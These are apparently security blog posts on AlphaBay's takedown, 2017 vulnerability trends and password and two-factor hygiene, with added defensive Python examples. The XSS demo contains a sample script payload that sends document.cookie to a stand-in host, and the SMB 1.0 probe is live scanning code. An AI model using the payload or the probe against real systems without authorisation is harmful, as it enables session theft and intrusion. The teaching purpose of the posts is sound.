Hacking the Irony

By Rob Medley

AlphaBay founder Alexandre Cazes had a bad week. Business on his Dark Web version of eBay was making the Canadian money hand over fist. He didn’t think he needed to worry about the police; his service operated behind anonymizing networks such as Tor and I2P. Things were really looking up, until the man found himself in a dank Bangkok jail. It seems, in a veritable twist of irony, that Cazes had fallen victim to the same reconnaissance and exploitation techniques that millions of individuals and businesses face each day.

“You will never find a more wretched hive of scum and villainy. We must be cautious”

AlphaBay, like Mos Eisley Spaceport in the Star Wars saga, was a bazaar of digital dubiousness. Anything and everything could be found there, from drugs, to arms, to hacking tools with extensive instructions and even customer support. It was a thriving bastion of capitalism dedicated to the underworld. Unfortunately for Cazes, the 1% were not getting their cut, so it had to be taken down. The beginning of the end was simple enough. Police had acquired Cazes’ email address ‘Pimp_alex_91@hotmail.com’ way back in 2014 while monitoring the site: in an unforced error, Cazes had put his personal email address into the site’s new-user welcome message. A personal touch like that is a good thing for the CEO of a legitimate business, showing that they care, but not so much for the operator of something that could land you in a Thai jail.

“Treachery has existed as long as there’s been warfare, and there’s always been a few people that you couldn’t trust.”

General James Mattis, the stalwart symbol of American military prowess, is a student of the eastern philosophy that teaches knowledge of your enemy as the key to defeating him. By the same token, any hacker worth his salt can start an attack on a network with a single piece of information, like an email address. Reconnaissance on that address can reveal social media and financial accounts, domain registration data, and the daisy-chain of contacts associated with it. The exploitation that follows can be as easy as sending a malicious link in a phishing email that appears to come from one of the target’s friends, placing malicious code on a site the target is likely to visit (a watering-hole attack), and, once a foothold exists, planting a rootkit to keep it.

“Once you’ve lost your privacy, you realize you’ve lost an extremely valuable thing.”

Billy Graham, the champion of cable TV Christianity, has a net worth of $25 million. Alexandre Cazes’ net worth, by contrast, was about the same, coming in at $23 million. When police launched Operation Bayonet, they basically followed the trail from Cazes’ exposed email address to his PayPal account and a front company, EBX Technologies. Eventually, this led them to Cazes himself in Bangkok, Thailand. A raid on the swashbuckling entrepreneur’s house produced the laptop Cazes used to run AlphaBay; it was unencrypted and logged into the AlphaBay site at the moment of its seizure. The lesson here? Encrypt your hard drive and your traffic, and remember that disk encryption only protects data while the machine is locked or powered off: an unlocked, logged-in laptop hands everything to whoever picks it up. So also have an extremely short inactivity lockout, especially if you are on the wrong side of the law.

“Have no fear of perfection – you’ll never reach it.”

Salvador Dalí, mustachioed master of Surrealism, knew that perfection can never be achieved; the same is true in security. Navigating the digital world around us takes caution and a hefty amount of risk acceptance or mitigation. It was not some grand marvel of network subversion that took down AlphaBay, but human carelessness. It is an ironic cautionary tale: those on the wrong side of the light, legally speaking, are just as susceptible to hacking as the rest of us in the bountiful lands of the mapped Internet. Basic awareness and caution should be embraced by anyone engaged in digital activities, because all it takes is an email address.

2017 Cybersecurity Vulnerability Trends

Looking at the state of cybersecurity by news headlines, one would logically assume that ransomware is all security professionals must worry about in their day-to-day operations. The nemesis of the moment is Petya, or more precisely the June 2017 variant widely called NotPetya. It spreads using EternalBlue, a leaked National Security Agency exploit for the SMB 1.0 flaw that Microsoft patched in MS17-010, and it looks for unpatched Windows machines of all flavors that still have SMB 1.0 enabled. SMB stands for Server Message Block; SMB 1.0 is the outmoded, decades-old version of the Windows file-sharing protocol, long since superseded by SMB 2.x and 3.x. Petya replaces your Master Boot Record with its own boot code and encrypts the NTFS Master File Table, so that you can’t do anything while it works on the rest of your files. The result? You can pay $300 in Bitcoin to some shadowy Russian hacking group and maybe get a decryption key for your files, or you can prevent the problem: install MS17-010 and turn off SMB 1.0. Note that disabling SMB 1.0 alone does not stop this variant; it also spreads with stolen administrator credentials over legitimate remote-administration channels, so patching and limiting where administrative credentials are used matter just as much. To turn off SMB 1.0, navigate to the Windows Features settings, uncheck the SMB 1.0/CIFS File Sharing Support feature, and reboot.  
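The check a practitioner wants before the reboot is to know which machines still answer SMB 1.0 at all. The following is an added example, not code from the original post: a minimal Python probe that sends an SMBv1 NEGOTIATE offering only an SMB1 dialect and reports whether the server accepts it. The packet layouts follow the SMB1 wire format; the reply bytes used for the offline demonstration are constructed, not captured, and `probe_smb1` should only be pointed at hosts you are authorised to test.

```python
import socket
import struct

# Added example, not part of the original article. A server that answers an
# SMB1-only NEGOTIATE with a dialect index still speaks SMB 1.0; one with SMB1
# disabled drops the connection or answers with no acceptable dialect (0xFFFF).
# Every byte string below is constructed from the SMB1 format, not captured.

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
DIALECT_NT_LM_012 = b"NT LM 0.12"   # the dialect every SMB1 stack still speaks


def smb1_header(command: int, status: int = 0, flags: int = 0x18) -> bytes:
    """32-byte SMB1 header. Flags2 0xC801 = unicode | NT status | ext. security | long names."""
    return SMB1_MAGIC + struct.pack(
        "<BIBHH8sHHHHH",
        command, status, flags, 0xC801,
        0,            # PIDHigh
        b"\x00" * 8,  # SecurityFeatures (signature), unused here
        0,            # Reserved
        0,            # TID
        0xFEFF,       # PIDLow
        0,            # UID
        0,            # MID
    )


def build_negotiate_request(dialects=(DIALECT_NT_LM_012,)) -> bytes:
    """NetBIOS session frame + SMB1 NEGOTIATE listing only SMB1 dialects."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)   # 0x02 = dialect buffer format
    smb = smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(data)) + data
    return struct.pack(">I", len(smb)) + smb   # session type 0x00 followed by 24-bit length


def parse_negotiate_response(frame: bytes):
    """Classify a reply: ('smb1', dialect_index), ('smb1-refused', None) or ('not-smb1', None)."""
    smb = frame[4:]                     # skip the NetBIOS session header
    if len(smb) < 33 or smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return ("not-smb1", None)       # SMB2 reply (0xFE 'SMB'), short read or garbage
    word_count = smb[32]
    if word_count == 0:                 # error response carries no parameter words
        return ("smb1-refused", None)
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    if dialect_index == 0xFFFF:         # server accepted none of the offered dialects
        return ("smb1-refused", None)
    return ("smb1", dialect_index)


def probe_smb1(host: str, port: int = 445, timeout: float = 3.0):
    """Live check against a host you are authorised to test."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_negotiate_request())
            reply = sock.recv(4096)
    except OSError:
        return ("not-smb1", None)       # SMB1-disabled servers typically reset or go silent
    return parse_negotiate_response(reply) if reply else ("not-smb1", None)


def constructed_reply(dialect_index: int) -> bytes:
    """Constructed NEGOTIATE response: WordCount 17, DialectIndex, other words zeroed, ByteCount 0."""
    words = struct.pack("<H", dialect_index) + b"\x00" * 32   # 17 words = 34 bytes
    smb = smb1_header(SMB_COM_NEGOTIATE, flags=0x98) + bytes([17]) + words + struct.pack("<H", 0)
    return struct.pack(">I", len(smb)) + smb


SMB1_ACCEPTED_REPLY = constructed_reply(0)       # server chose dialect 0 = NT LM 0.12
SMB1_REFUSED_REPLY = constructed_reply(0xFFFF)   # server rejected every dialect
SMB2_REPLY = b"\x00\x00\x00\x40" + b"\xfeSMB" + b"\x00" * 60   # SMB2 magic, not SMB1

if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:
        print(host, *probe_smb1(host))
```

A host that answers with a dialect index is still exposing SMB 1.0 and needs both the MS17-010 patch and the feature removed; one that resets the connection or answers 0xFFFF has SMB 1.0 off. An authenticated configuration query or a full scanner is more thorough for inventory; this shows what those tools do on the wire.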

But ransomware isn’t the nightmare that should keep security professionals up at night.  Indeed, a tested backup policy, with copies kept offline where the malware cannot reach them, limits the damage from any lapse in patch management.  What should keep us up at night is our own state of being human.  As humans, we are imperfect creatures.  As much as we strive for greatness, there is always that one thing we might not have accomplished while juggling the many tasks of our daily rituals.  Statistically, the vulnerabilities we see reflect the state of our profession.  

Per the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD), the greatest threat category of 2017 isn’t ransomware, it’s buffer errors, followed by improper access control, information leaks / disclosure, cross-site scripting, and permission, privilege and access control weaknesses.


Buffer overflows? Okay, I get it. The development world is complex, and errors are going to happen. One of the beauties of our human condition is that we can always find better ways to do things, or, on the malevolent side, ways to exploit things. Luckily, protections against buffer overflows keep evolving: bounds-checked string and memory libraries, stack canaries, non-executable stacks and heaps, and address space layout randomization all make exploitation harder, though none of them substitutes for fixing the bug.

Cross-site scripting (XSS) has been on the security radar for a while now, yet it has declined from its height of 14.3% of all vulnerabilities in 2009 to its current 9.2%. XSS is a legitimate attack vector, and its decline in prevalence shows that developers and admins have been waging an effective battle against the threat. The industry focus on web threats has led to some interesting countermeasures, including browser isolation (essentially running the browser in its own virtual machine or container), JavaScript sandboxing, and Content Security Policy (CSP); together with the old standby of context-aware output encoding, they are effectively mitigating the threat.
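As an added example (not from the original post), here is what the server-side half of that defence looks like in Python: the same template rendered with and without context-aware encoding, plus the CSP header that backs the encoding up if a template slips. The attack strings are constructed; `render_unsafe`, `render_safe`, `safe_href` and `CSP_HEADERS` are illustrative names, not a particular framework’s API.

```python
import html
from urllib.parse import urlsplit

# Added example, not part of the original article: output encoding per context,
# the control that makes reflected and stored XSS fail regardless of what the
# browser does. All input strings used here are constructed attack samples.

SAFE_URL_SCHEMES = {"http", "https", "mailto"}


def render_unsafe(name: str, site: str) -> str:
    """The classic bug: untrusted data concatenated straight into HTML."""
    return f'<p>Hello {name}! <a href="{site}">your site</a></p>'


def safe_href(url: str) -> str:
    """Allow only harmless schemes; javascript:/data: URLs become an inert anchor.

    Browsers strip tab, CR and LF from URLs before parsing, so 'java\\nscript:'
    executes; strip them first so the scheme check sees what the browser sees."""
    cleaned = "".join(c for c in url if c not in "\t\r\n").strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in SAFE_URL_SCHEMES:
        return "#"
    return html.escape(cleaned, quote=True)   # quote=True also encodes " and ' for attributes


def render_safe(name: str, site: str) -> str:
    """Encode for the HTML text context and the attribute/URL context separately."""
    return f'<p>Hello {html.escape(name)}! <a href="{safe_href(site)}">your site</a></p>'


# Response headers that limit what an injected tag could do even if encoding is missed.
CSP_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
}

if __name__ == "__main__":
    payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    print(render_unsafe(payload, "javascript:alert(1)"))   # script and javascript: link survive
    print(render_safe(payload, "javascript:alert(1)"))     # rendered as harmless text, href="#"
```

The inline `'unsafe-inline'` keyword is deliberately absent from `script-src`: a CSP that allows inline scripts leaves a reflected payload fully functional, which is the most common way CSP deployments end up decorative.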

What should give security folks pause is the rise in threats that stab at the very heart of our job description. Ensuring the confidentiality, integrity, and availability of information resources is what we do for a living. On a personal level, each of us should take offense that vulnerabilities exploiting access controls, permissions, and privileges even exist, let alone rank among the top threats to our networks. To be sure, buffer overflows can lead to escalation of privilege, but we must not assume that security faults in controls and privileges are solely the result of software weaknesses. NIST doesn’t take that approach either: buffer errors are their own category, separate from access and privilege weaknesses.

So, what do we do? First and foremost, we should let go of our ego. Don’t assume that every security detail has been taken care of. Get in the habit of double-checking yourself; make sure those privileges and controls are properly set and, most important, still relevant. If security needs are not being met, double down on ensuring your settings are up to date. Use those checklists, validate your templates, and adopt habits that put security first.
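Double-checking that privileges are still correctly set is something a script can do on a schedule rather than a person once. The following is an added example, not part of the original post: a small Python audit that walks a directory tree and flags world-writable entries, setuid/setgid binaries, and private keys readable by anyone other than their owner. The rules, the secret-file suffixes and the sample tree it builds are constructed for the demonstration; adapt them to your own baseline.

```python
import os
import stat
import tempfile

# Added example, not part of the original article: re-verify filesystem
# permissions instead of trusting that they were set correctly once.
# SECRET_SUFFIXES and the sample tree are constructed for the demo.

SECRET_SUFFIXES = (".pem", ".key", "id_rsa", ".kdbx", ".env")


def audit_permissions(root: str):
    """Walk `root` and return a list of (path, finding) tuples."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue                       # the link target is judged on its own visit
            mode = stat.S_IMODE(st.st_mode)
            is_dir = stat.S_ISDIR(st.st_mode)
            # World-writable: anyone can tamper. A sticky dir (/tmp style) is the accepted exception.
            if mode & stat.S_IWOTH and not (is_dir and mode & stat.S_ISVTX):
                findings.append((path, "world-writable"))
            # setuid/setgid files are privilege boundaries; each one must be on the approved list.
            if not is_dir and mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((path, "setuid/setgid"))
            # Private keys and vaults readable by group or others leak the secret outright.
            if not is_dir and name.endswith(SECRET_SUFFIXES) and mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((path, "secret readable by group/others"))
    return findings


def build_sample_tree() -> str:
    """Constructed tree: one correctly locked key, one over-shared key, one world-writable script."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    specs = {"good.key": 0o600, "shared.pem": 0o644, "deploy.sh": 0o777, "notes.txt": 0o644}
    for name, mode in specs.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    return root


def audit_sample():
    """Run the audit over the constructed tree and return {(filename, finding)}."""
    return {(os.path.basename(p), f) for p, f in audit_permissions(build_sample_tree())}


if __name__ == "__main__":
    for name, finding in sorted(audit_sample()):
        print(f"{finding:36} {name}")
```

Run it against the directories that hold your keys, configuration and deployment scripts, and diff the output against last week’s run: a finding that appears between runs is exactly the kind of drift the text warns about.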

Let’s make it a community goal to not see security essentials on the NVD vulnerability trends for 2018. 

The Power of Two-Factor Authentication

By Rob Medley
June 11, 2016

With the news of numerous hacks in the last few weeks, it’s not far-fetched to propose that people are worried.  Not only is the individual user concerned about theft of personal information and password databases from the likes of Myspace, LinkedIn, Twitter, and the Office of Personnel Management, but business owners, particularly small business owners, are increasingly becoming the victims of hackers.

While it’s become a joke for large corporations to apologize to consumers, hand out 12 months of nearly worthless identity theft protection, then hide behind a phalanx of lawyers, small business owners do not have that luxury.  In a recent survey, the Federation of Small Businesses (FSB) reported that 93% of small business owners have some type of cybersecurity initiative in place[i].  93% is a good start.  Where it becomes troublesome is that two-thirds of those same businesses have been victims of cyber-crime in the last two years. Two-thirds! Adding the seven percent that are blissfully unaware of the dangerous online environment surrounding them, that’s roughly seven out of every ten business owners being victimized; the rest are just lucky.

At the heart of what we are talking about is basic security hygiene.  There are plenty of simple things netizens and businesses can do, yet choose not to, because they are focused on other things, such as meeting production, revenue and other business goals.  The security world is still dealing with easily guessed passwords after 30+ years of telling people not to use them.  If you look at the news surrounding the LinkedIn and Twitter hacks, the same supremely weak passwords are still showing up: ‘123456’, ‘password’, ‘Redskins’, etc.  Some think they are being smarter than the hacker by using number substitution, e.g. ‘10v3’ instead of ‘Love’.  Believe me when I say these are just as weak; common password-cracking tools apply these substitution rules to their wordlists by default.  Indeed there is no truly uncrackable password, but a long, random mix of letters, digits and special characters raises the time needed to crack it enormously – meaning you are no longer the low-hanging fruit.  The problem?  These complex passwords are no longer easy to remember, so they get written down, totally defeating the purpose of the endeavor.
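To see why number substitution buys nothing, here is an added example (not from the original post) of the reverse mapping a cracking rule set applies: it undoes the common leet substitutions and strips the trailing year or symbol before comparing against a wordlist, so ‘10v3’ and ‘P@$$w0rd2017!’ collapse onto ‘love’ and ‘password’. The wordlist, the substitution table and the `is_weak` policy are constructed for illustration; real crackers carry thousands of such rules.

```python
import re
import unicodedata

# Added example, not part of the original article. COMMON is a constructed
# fragment of a wordlist, not a real breach dump; the rule set is a small
# subset of what cracking tools apply automatically.

LEET_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                          "7": "t", "@": "a", "$": "s", "!": "i", "|": "l"})
COMMON = {"password", "love", "redskins", "letmein", "qwerty", "welcome", "123456"}


def ascii_lower(candidate: str) -> str:
    """Fold case and accents so 'Pässwörd' is compared as 'password'."""
    return unicodedata.normalize("NFKD", candidate).encode("ascii", "ignore").decode().lower()


def variants(candidate: str):
    """Yield the forms a rule-based cracker would try: raw, de-leeted, suffix-stripped, both."""
    base = ascii_lower(candidate)
    stripped = re.sub(r"[^a-z]+$", "", base)      # 'Redskins2016!' -> 'redskins'
    yield base
    yield base.translate(LEET_MAP)                 # '10v3' -> 'love'
    yield stripped
    yield stripped.translate(LEET_MAP)             # 'P@$$w0rd2017!' -> 'password'


def is_weak(candidate: str, wordlist=COMMON, min_length: int = 12):
    """Return (weak, reason). Length is checked first because short passwords fall to brute force anyway."""
    if len(candidate) < min_length:
        return True, "shorter than %d characters" % min_length
    for form in variants(candidate):
        if form in wordlist:
            return True, "dictionary word or leet variant of one (%r)" % form
    return False, "ok"


if __name__ == "__main__":
    for pw in ("10v3", "P@$$w0rd2017!", "Redskins2016!", "correct horse battery staple"):
        print(f"{pw!r:34} weak={is_weak(pw)[0]} ({is_weak(pw)[1]})")
```

The last candidate passes not because it contains symbols but because it is long and is not derived from a single dictionary word; that, rather than cleverness with digits, is what buys cracking time.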

Enter password managers and two-factor authentication.  This rock-star duo can make your life much less complicated.   By using a password manager such as LastPass or Dashlane, you can store and sync all of your passwords online.  Highly dangerous, you say?  Dashlane, for example, prompts you to create a master password; forget it and you lose access to your account.  Because the vault is encrypted with a key derived from that master password, the company never holds your information in readable form, and neither does a hacker who breaches the company.  Why does that matter?  Often the weak point of a business’s architecture is some procedural vulnerability that lets the hacker reach your hashed or (God forbid) cleartext data stored on the company’s servers.  You can also enable text-message authentication via your mobile phone, or a hardware key such as a YubiKey.  These second factors are much more difficult to circumvent because you are combining something you know with something you have.

A cautionary note on using your mobile number as a second factor: log in or call your service provider and add a PIN requirement and a notification of any attempt to change your account information.  If you leave it at just a password, a hacker can gather your personal data (name, date of birth, address, social security number, etc.) from other sources, e.g. LinkedIn, Twitter, Facebook, and use it to hijack your phone number by having it moved to a SIM or carrier they control.  If successful, the hacker receives your verification texts and works around the phone as a second form of identity verification.  Where a service offers it, prefer an authenticator app or a hardware key, neither of which depends on the phone number at all.

Hackers are very smart people.  I respect their knowledge and dedication.  However, they are often able to succeed because of a lapse in policy, procedure, or basic security hygiene on the part of the individual or business.  While large corporations can absorb the damage and loss of reputation from a breach, the small business and individual cannot.  Paying attention to topics such as governance and policy can help save the business heartache down the road.  As a business or even an individual, if you are too busy to focus on these areas, people like me are at your disposal.  Reaching out to a consultant who can help you overcome these obstacles can save time, money, and reputation down the road.

 

Rob Medley operates Policy Assured, LLC – a veteran-owned information assurance company.

[i] Small businesses bearing the brunt of cyber-crime. (2016, June 10). Retrieved June 11, 2016, from http://www.fsb.org.uk/media-centre/latest-news/2016/06/10/small-businesses-bearing-the-brunt-of-cyber-crime